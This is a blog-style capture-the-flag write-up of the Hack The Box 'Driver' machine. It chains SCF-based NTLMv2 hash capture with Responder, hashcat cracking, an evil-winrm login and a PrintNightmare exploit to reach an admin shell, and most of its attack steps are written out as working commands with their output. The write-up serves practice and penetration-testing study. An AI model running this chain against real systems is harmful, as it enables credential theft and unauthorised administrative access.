WINDOWS PRINTER DRIVER

Here’s a fun rundown of a zero day vulnerability that was seen last year. It was called PrintNightmare, and it ravaged through some Windows computers. It used two CVEs that first grabbed credentials through SMB, and second allowed privilege escalation through the printer spool. I was able to play with this through a practice computer found on Hack The Box but can’t reveal its name due to it still being an active challenge (against the rules). In any case, seeing the exploit in action below should give you a good idea of the exploit’s capabilities.

RESOURCE FOR SMB SHARE SCF

Excerpt from this site:

When the user will browse the share a connection will established automatically from his system to the UNC path that is contained inside the SCF file. Windows will try to authenticate to that share with the username and the password of the user. During that authentication process a random 8 byte challenge key is sent from the server to the client and the hashed NTLM/LANMAN password is encrypted again with this challenge key. Responder will capture the NTLMv2 hash.

With basic credentials, this .scf file can be used to initiate a flow of viewable information. Before uploading, make a responder available to receive the information.

└─$ sudo responder -wrf --lm -v -I tun0                                                                                                                                             255 ⨯
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.6.0

It will proceed to dump NTLMv2 hashes. When the hash is given to hashcat to crack the password, mode 5600 can be used for the type.

[+] Listening for events...

[SMB] NTLMv2 Client   : <ip address>
[SMB] NTLMv2 Username : COMPUTER\name
[SMB] NTLMv2 Hash     : name::DRIVER:776516c99e3a235c:3143C1E96FF27753287E4431515A78B4:0101000000000000555B90A0EF02D801CA788040016788FA00000000020000000000000000000000

Now that the hash has shown itself, you can save the entire hash string (line three after the colon) to a text file for analysis in hashcat. The wordlist I used is standard for practicing and this crack took less than a minute. Keep in mind that a larger cracking machine may be required if this is being done in real-world penetration testing.

└─$ hashcat -m 5600 tony.hash ~/kalidata/TOOLS/wordlist/rockyou.txt
hashcat (v6.1.1) starting...

Hashcat will spit out a line that should reveal the user’s password at the end. The new credentials can now be used to log onto Windows using evil-winrm. This is a tool that uses Windows Remote Management to talk to a Microsoft OS.

REFERENCE FOR EVIL-WORM INSTALL

└─$ sudo ./evil-winrm.rb -i $ip -u COMPUTER\\name -p password

And finally, take advantage of CVE-2021-34527 (PrintNightmare) by executing some commands and a payload on the target machine. I chose to use John Hammond’s Print Nightmare Exployt to accomplish this, however there are many proof of concept examples to choose from.

*Evil-WinRM* PS C:\temp> upload /home/kali/kalidata/TOOLS/uploads/CVE-2021-34527.ps1
Info: Uploading /home/kali/kalidata/TOOLS/uploads/CVE-2021-34527.ps1 to C:\temp\CVE-2021-34527.ps1
*Evil-WinRM* PS C:\temp> Import-Module .\cve-2021-34527.ps1
*Evil-WinRM* PS C:\temp> Invoke-Nightmare

This should reveal an admin shell following execution. This was very easy and extremely interesting to accomplish. If you haven’t already, you should check for vulnerabilities within your network and apply the appropriate patches to your systems to stay safe.

PrintNightmare

WINDOWS PRINTER DRIVER

HOME

OSCP References

NOTES & STRATEGIES

TECHNIQUES

THE BASICS

LINUX

LISTENING / GATHERING

BUFFER OVERFLOWS

HACK THE BOX FOOTHOLDS

TRY HACK ME FOOTHOLDS